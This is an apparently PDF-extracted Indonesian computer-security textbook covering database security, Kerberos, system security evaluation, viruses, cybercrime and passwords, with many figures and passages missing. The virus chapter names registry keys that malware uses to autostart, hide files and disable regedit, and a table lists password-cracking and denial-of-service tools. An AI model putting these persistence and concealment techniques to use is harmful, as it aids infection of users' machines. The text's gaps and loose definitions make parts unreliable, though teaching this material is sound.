utama yang diinginkan selalu, saat sebuah basis data sedang diakses.
Namun kesalahan seperti bugs, kecelakaan, malapetaka akibat human-
error, dan serangan ke basis data adalah sesuatu hal yang kadangkala
sulit untuk diprediksi namun dapat dicegah bila dilakukan tindakan
preventif sedini mungkin. Dengan melakukan tindakan back-up data
secara periodik, hal-hal yang sewajarnya bisa dihindari dapat
direalisasikan sehingga user dapat melakukan perbandingan antara sistem
di saat sekarang sedang berjalan dengan hasil back-up data sebelumnya.
Dengan demikian akan ada tindakan analisa apakah telah terjadi
perubahan data pada sistem ataukah masih berjalan sewajarnya.
Tujuan
1. Mengetahui dan Memahami aspek terpenting keamanan basis
data dan alasan melindunginya
2. Mengetahui dan Memahami klasifikasi keamanan basis data
3. Mengetahui dan Memahami apa yang menjadi aspek kehandalan
keamanan basis data
4. Mengetahui dan Memahami yang dimaksud back-up dan recovery
dan manfaatnya untuk keamanan basis data
Keamanan Komputer 73
Beberapa hal penting mengapa harus menjadi perhatian khusus dalam
keamanan basis-data adalah sebagai berikut:
• Kemampuan menyediakan informasi dengan cepat dan akurat,
adalah merupakan kebutuhan dalam information-based society.
• Sangat pentingnya informasi sehingga hanya boleh diakses oleh
orang yang memiliki otorisas (hak akses).
• Adanya trend trade-secret, yaitu jual-beli data, sehingga ada muncul
perilaku untuk mencuri informasi, karena ada nilai ekonomis-nya.
• Privacy / confidentiality
Seperti bagaimana memproteksi data bersifat pribadi yang sensitive
seperti:nama, tempat tanggal lahir, agama, hobby, penyakit yang
pernah diderita, status perkawinan; data pelanggan; dan transaksi
pada ecommerce. Juga khususnya melakukan proteksi terhadap
serangan sniffer.
• Integrity
Tindakan bagaimana agar informasi tidak berubah tanpa ijin seperti:
Keamanan Komputer 75
o Tampered (data baru menimpa data lama)
o Altered (perubahan terhadap nilai data yang eksis, yakni
data ter-edit)
o Modified (data yang eksis dapat disisipkan, ditambah,
dihapus oleh data baru)
Khususnya melakukan proteksi terhadap serangan: spoof, virus,
Trojan horse.
• Authentication (otentikasi)
Tindakan otentifikasi dilakukan untuk meyakinkan keaslian data,
sumber data yang diakses, user yang mengakses data, serta server
yang digunakan, dengan melakukan cara seperti: penggunaan digital
signature, dan biometrics.
Ini dilakukan untuk memproteksi terhadap serangan seperti
password palsu.
• Availability
Artinya, informasi harus dapat tersedia ketika dibu tuhkan, dengan
menghindari server dibuat hang, down, crash.
Tindakan ini bertujuan untuk proteksi terhadap serangan: denial of
service (DoS) attack.
• Non-repudiation
Non-repudiation maksudnya menghindari akses-user agar tidak
dapat menyangkal bahwa telah melakukan transaksi; dengan cara
setiap akhir transaksi pada form dilengkapi dengan penggunaan
digital signature.
Hal ini dilakukan untuk proteksi terhadap serangan: deception.
• Access control
Dengan adanya access control, maka ada sebuah mekanisme yang
digunakan untuk mengatur user dan akses yang dilakukan oleh user
(siapa boleh melakukan apa).
76 Keamanan Komputer
Batasan privillege-user untuk Access Control pada basis data ditunjukkan
pada skema berikut ini:
Master File (File Induk): dalam sebuah aplikasi, file ini merupakan file
yang penting karena berisi record-record yang sangat perlu di dalam
organisasi.
History File (File Sejarah): berisi data masa lalu yang sudah tidak aktif
lagi, namun masih tetap disimpan sebagai arsip.
Backup File (File Pelapis): salinan dari file-file yang masih aktif di dalam
basis data pada suatu saat tertentu
Keamanan Komputer 77
Hirarki organisasi data dapat ditunjukkan sebagai berikut:
78 Keamanan Komputer
Gambar 8.3
Skema Akses dan Prosedur pada Basis Data yang terkoneksi online
Oleh sebab itu untuk menjaga keamanan Basis Data dibutuhkan beberapa
cara seperti:
• Penentuan perangkat lunak Basis Data Server yang handal.
• Pemberian otoritas kepada user mana saja yang berhak
mengakses, serta memanipulasi data-data yang ada.
Gambar 8.4
Skema Lapisan pada Basis Data yang dinterkoneksikan dengan aplikasi
Keamanan Komputer 79
Beberapa penyalahgunaan basis data:
Sedangkan yang dimaksud dengan Tabel View pada keamanan basis data
adalah metode pembatasan bagi user untuk mendapatkan model basis-
data yang sesuai dengan kebutuhan pengguna.Metode ini dapat
menyembunyikan data yang tidak digunakan atau tidak perlu dilihat oleh
user.
Keamanan Komputer 81
• Drop Authorization adalah user diperbolehkan menghapus relasi
yang sudah ada.
Keamanan Komputer 83
Ada 2 cara penerapan database server bila di luar DMZ
84 Keamanan Komputer
– Jika switch sudah dikuasai, maka intruder dapat
meneruskan trafik di area DMZ ke port dari server yang
sudah dikuasai
Keamanan Komputer 85
BAB 9
KERBEROS
Aliran informasi dalam jaringan yang sangat deras dan beragam
membuat keamanan jaringan adalah hal yang sangat penting dan rentan
akan gangguan.
Kerberos merupakan suatu teknik keamanan dari aspek otentikasi.
Kerberos memungkinkan client dan server untuk saling mengotentikasi
sebelum melakukan koneksi. Pada bab ini dibahas mengenai apa dan
bagaimana Kerberos itu.
Tujuan
86 Keamanan Komputer
Gambar 9.1 Struktur Kerberos
Enkripsi
Kerberos akan memberikan tiket pada client dan server yang telah
dienkripsi, jika server dan client berkomunikasi dengan membandingkan
tiket yang diberikan oleh Kerberos, jika sama maka komunikasi dapat
dilanjutkan.
Otentikasi
Keamanan Komputer 87
• Tickets merupakan encrypted passes atau encrypted files yang
dikeluarkan oleh "trusted" server kepada user dan proses untuk
menentukan access level
Prosesnya:
Ticket Granting Ticket (TGT) yang diterima pada saat otentikasi
digunakan untuk memeriksa kesesuaian antara nama client dan kuncinya,
jika sesuai maka akan dilakukan deskripsi client
1. Client Ticket akan digunakan oleh client dan server untuk
berkomunikasi, seluruhnya dienkripsi dengan kunci yang
hanya diketahui client dan Kerberos.
2. Server Ticket dienkripsi dengan menggunakan kunci rahasia
server dan Kerberos
88 Keamanan Komputer
Kemudian client mengirimkan server ticket ini kepada server. Setelah
client menerima balasan dari Kerberos berupa kunci enkripsi tersebut,
client mendekripsi client ticket. Server mendekripsi server ticket dengan
menggunakan kunci rahasianya dan memperoleh kunci enkripsi dari
Kerberos untuk mendekripsi client. Jika terjadi kesesuaian maka
komunikasi berlanjut.
Kelebihan Kerberos
• Pembaharuan otorisasi berupa tiket dapat diselenggarakan
sesegera mungkin
• Relatif aman dan terpercaya karenahanya ada satu Server
Kerberos
Keamanan Komputer 89
BAB 10
EVALUASI KEAMANAN SISTEM INFORMASI
10.1 Penyebab masalah keamanan harus selalu dimonitor :
Tujuan :
1. Mengetahui dan Memahami Penyebab Masalah Keamanan Pada
Sistem Komputer
2. Mengetahui dan Memahami Pengujian Keamanan Sistem
Komputer
90 Keamanan Komputer
• Contoh :
• Lemah disainnya algoritma enkripsi ROT13 atau Caesar
cipher, dimana karakter digeser 13 huruf atau 3 huruf.
Meskipun diimplementasikan dengan programming yang
sangat teliti, siapapun yang mengetahui algoritmanya dapat
memecahkan enkripsi tersebut.
• Kesalahan disain urutan nomor (sequence numbering) dari
paket TCP/IP. Kesalahan ini dapat dieksploitasi sehingga
timbul masalah yang dikenal dengan nama “IP spoofing”
(sebuah host memalsukan diri seolah-olah menjadi host lain
dengan membuat paket palsu setelah engamati urutan paket
dari host yang hendak diserang).
3. Salah konfigurasi
Contoh :
• Berkas yang semestinya tidak dapat diubah oleh pemakai
secara tidak sengaja menjadi “writeable”. Apabila berkas
tersebut merupakan berkas yang penting, seperti berkas yang
digunakan untuk menyimpan password, maka efeknya
menjadi lubang keamanan. Kadangkala sebuah komputer
dijual dengan konfigurasi yang sangat lemah.
• Adanya program yang secara tidak sengaja diset menjadi
“setuid root” sehingga ketika dijalankan pemakai memiliki
akses seperti super user (root) yang dapat melakukan apa saja.
Keamanan Komputer 91
4. Salah menggunakan program atau sistem
Contoh :
• Kesalahan menggunakan program yang dijalankan dengan
menggunakan account root (super user) dapat berakibat fatal.
Tools Kegunaan
Crack program untuk menduga atau memecahkan password
dengan menggunakan sebuah atau beberapa kamus
(dictionary). Program crack ini melakukan brute
force cracking dengan mencoba mengenkripsikan
sebuah kata yang diambil dari kamus, dan kemudian
membandingkan hasil enkripsi dengan password
yang ingin dipecahkan.
land dan latierra sistem Windows 95/NT menjadi macet (hang, lock
up). Program ini mengirimkan sebuah paket yang
sudah di”spoofed” sehingga seolah-olah paket
tersebut berasal dari mesin yang sama dengan
menggunakan port yang terbuka
Ping-o-death sebuah program (ping) yang dapat meng-crash-kan
Windows 95/NT dan beberapa versi Unix.
Winuke program untuk memacetkan sistem berbasis
Windows
Dan sebagainya…
92 Keamanan Komputer
Probing Services
Keamanan Komputer 93
Program penguji probing (penguji semua port otomatis) :
OS fingerprinting
94 Keamanan Komputer
Penggunaan program penyerang
Keamanan Komputer 95
Program network monitoring / management :
• Etherboy (Windows), Etherman (Unix)
• HP Openview (Windows)
• Packetboy (Windows), Packetman (Unix)
• SNMP Collector (Windows)
• Webboy (Windows)
Keamanan Database
Penyerangan Database
• Informasi sensitif yang tersimpan di dalam database dapat terbuka
(disclosed) bagi orang-orang yang tidak diizinkan (unauthorized ).
• Informasi sensitif yang tersimpan di dalam database dapat altered in
an unacceptable manner
• Informasi sensitif yang tersimpan di dalam database dapat
inaccessible bagi orang-orang yang diizinkan.
• the underlying operating system may be attacked -- most difficult
problem
96 Keamanan Komputer
o Honeywell LOCK Data Views (LDV) database system ;
pieces of data labeled as nonsensitive, aggregates labeled as
sensitive
o SRI SeaView database system ; pieces of data labeled as
sensitive, aggregates may then be labeled as non sensitive
Keamanan Komputer 97
BAB 11
VIRUS
11.1. Pengertian Virus
Tujuan :
1. Mengetahui dan Memahami apa yang di maksud dengan Virus
2. Mengetahui dan Memahami Jenis-Jenis Virus
3. Mengetahui dan Memahami Perbedaan Virus dengan Program
Komputer Lainnya
4. Mengetahui dan Memahami Struktur Virus
5. Mengetahui dan Memahami Cara Kerja Virus
6. Mengetahui dan Memahami Serangan Virus Ke Sistem Komputer
7. Mengetahui Tanda-tanda Komputer terinfeksi Virus
b) Virus file
Menyerang file yang dijalankan oleh suatu sistem operasi. Biasanya
menyerang com atau exe.
98 Keamanan Komputer
e) Polymorphic virus
Virus dirancang untuk mengelabui program AV yaitu dengan mengubah
struktur dirinya setelah menjalankan perintah
f) Stealth virus
Mengendalikan instruksi – instruksi level DOS dengan menguasai tabel
interrupt.
g) Macro virus
Ditulis oleh bahasa pemrograman dari suatu aplikasi, sehingga bersifat
platform independent.
Keamanan Komputer 99
Biasanya virus akan memasang penanda dan menyisipkan program untuk
memperbanyak virus tersebut.
4. Kode pemicu
5. Kode Manipulasi
3. Lalu, seperti yang diterangkan pada ilustrasi gambar 11.1, virus akan
menjalankan kode penggandaan diri yaitu dengan mencari file
berekstensi tertentu (yang banyak digunakan oleh user komputer),
seperti .exe, .jpg, .doc, dan lain – lain. Misalnya virus menemukan file
yang bernama sehat.doc, selanjutnya virus akan memeriksa apakah
file tersebut ada kode penandanya.
4. Jika file tersebut tidak ada kode penanda maka virus akan menginfeksi
file yang sehat tersebut, atau menyisipkan kode virus seperti gambar
11.2 kemudian virus akan mencari file yang belum terinfeksi.
Gambar 11. 2 Virus mencari file lain setelah menulari file sehat
Registry
Di tiap – tiap registry utama terdapat key utama terdapat key anak yang
berguna untuk menyimpan value.
Value
Value di sini adalah isi dari key yang ada di registry windows.
Gambar di bawah ini hanyalah contoh dari value :
Sebenarnya ada jenis – jenis lain tetapi jarang dipakai dalam registry itu
sendiri.
Alamat Registry
Alamat registry:
HKEY_CURRENT_USER
\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\
Berguna untuk memanipulasi kode explorer
Alamat registry:
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentV
ersion\
Berguna untuk memanipulasi drive penginstalan, Lisensi pada Windows.
Registry pemicu ini berguna untuk memicu file virus, sehingga virus
otomatis akan aktif jika windows masuk.
Alamat:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\
Pada gambar 11.8 Extensi file masih dapat terlihat, Yaitu file winword
dengan extensi file ICO dan file wepkeys dengan extensi f ile txt.
Biasanya virus menyembunyikan extensi file tersebut, agar user tertipu,
seperti yang dilakukan oleh w32.rontokbro atau w32.kangen, dan virus
lainnya.
Alamat:
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advance
d\
Key : HideFileExt
Value : 1
Jika extensi file disembunyikan, maka terlihat akan seperti pada gambar
berikut:
Alamat registry ini berguna untuk menyembunyikan file yang ber artribut
hidden. Jadi untuk mempertahankan kelangsungan hidupnya, virus
menyembunyikan diri dengan mengeset file beratribut hidden. Walaupun
sebenarnya ada tehnik lain, yaitu dengan membuat nama file utama virus
mirip dengan nama system file di windows, misalnya :
- Pada virus brontok menggunakan nama file svchost, lsass, csrss, dan
lain – lain, nama file tersebut mirip dengan nama file system yang ada
pada windows.
- Pada virus riyani_jangkaru menggunakan nama file xpshare
- Pada virus kangen nama file virusnya adalah NvsScd
Alamat registry untuk menyembunyikan file yang beratribut hidden
tersebut adalah:
Alamat:
HKCU\Software\Microsoft\Windows\CurrentVersion\Expl
orer\Advanced\
Key : Hidden
Value : 0
Untuk jelasnya, coba lihat gambar berikut ini :
File yang beratribut hidden pada windows explorer ditandai dengan icon
yang kabur. File tersebut dapat disembunyikan dengan alamat registry di
atas tadi. Sehingga pada windows explorer nanti file msdos.sys tidak
Jika kalian tidak menemukan file virus yang beratribut hidden, ubah
value pada registry tersebut dengan nilai 1.
Alamat :
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\
Key : DisableRegistryTools
Value : 1
Agar regedit dapat dibuka kembali ubah hapus nilai registry tersebut.
Jadi sebenarnya dalam sysedit ini kita bisa memanipulasi file yang
pertama kali dieksekusi oleh windows ketika windows berjalan di
computer anda.
- Config.sys
Config.sys adalah file yang memuat tentang seluruh konfigurasi windows
dan dijalankan ketika pertama kali windows mulai. Letak file ada di drive
C:\ dan mempunyai atribut file system dan hidden.
- Autoexec.bat
Autoexec.bat adalah file yang berisi perintah yang ada di komputer dan
akan dijalankan pertama kali ketika windows berjalan. Letak f ile ada di
drive C:\ dan mempunyai atribut file system dan hidden. Coba Untuk
membuktikannya, buka file Autoexec.bat ini kemudian ketik:
Dir c: > c:\coba.txt
Lalu simpan dan restart komputer anda, apa yang terjadi? Nah coba cek
di drive c: di komputer anda, pasti ada file coba.txt, karena pada perintah
di atas autoexec.bat menjalankan perintah windows yaitu ‘dir’ dan
menyimpannya ke file coba.txt di drive c.
- System.ini
System.ini adalah sebuah file yang berguna untuk menyimpan da ta f ont
yang diakses oleh
windows ketika pertama kali.
MSCONFIG
klik salah satu bar yang ada di aplikasi MSCONFIG tersebut. Misalnya
klik bar ‘SYSTEM.INI’ maka akan muncul gambar seperti di bawah ini
kan:
Seperti pada gambar, tombol start yang diklik akan muncul fasilitas,
Control Panel, My Document, My Computer, Search, Run, Log of f dan
Shut Down.
Sedangkan jika komputer terkena virus, maka tombol startnya akan
seperti ini:
Gambar diatas adalah gambar tombol start yang terkena virus, yaitu tidak
adanya “Control Panel”, “search” dan “Run”.
Gambar 11.20:
Pesan yang dimunculkan virus ketika mengeblok kotak Run
5. Kemudian tekan tombol DEL atau ke klik ke menu EDIT dan klik
DELETE, maka akan
muncul kotak pesan sbb:
6. Klik Yes aja, Kemudian tekan tombol ALT + S untuk meyimpan hasil
kerjaan kita.
7. Buka aja file doc yang sudah diedit tadi.
Tujuan :
1. Mengetahui dan Memahami Apa yang dimaksud dengan Cyber
Crime
2. Mengetahui dan Memahami Karakteristik, Klasifikasi dan Jenis -
Jenis Cyber Crime
3. Mengetahui Tinjauan Hukum Cyber Crime
12.2 Karakteristik
• Ruang lingkup kejahatan
• Sifat kejahatan
• Pelaku kejahatan
• Modus kejahatan
• Jenis kerugian yang ditimbulkan
• Fraud
Adalah sejenis manipulasi informasi keuangan dengan tujuan untuk
mengeruk keuntungan sebesar-besarnya.
• PHISING
Phising adalah kegiatan memancing pemakai komputer di internet
(user) agar mau memberikan informasi data diri pemakai (username)
dan kata sandinya (password) pada suatu website yang sudah di-
deface.
• SPAMMING
Spamming adalah pengiriman berita atau iklan lewat surat elektronik
(e-mail) yang tak dikehendaki.
• MALWARE
Malware adalah program komputer yang mencari kelemahan dari
suatu software
• DEFACING
Defacing adalah kegiatan mengubah halaman situs/website pihak
lain,
Ini ada juga daftar beberapa situs yang di deface menjelang HUT RI
tahun 2007 :
Tujuan :
1. Mengetahui dan Memahami Apa yang dimaksud dengan
Password
2. Mengetahui Perkembangan Password
3. Mengetahui dan Memahami upaya untuk mengamankan proteksi
password
4. Mengetahui dan Memahami Kebijakan Pengamanan
5. Mengetahui dan Memahami Kesalahan utama para pengguna
password
6. Mengetahui dan Memahami Penggunaan Password yang baik
Dari kelima kesalahan tersebut, hanya empat yang berkaitan erat dengan
penggunaan password. Berikut ini adalah empat kesalahan utama yang
berhubungan dengan pengamanan password: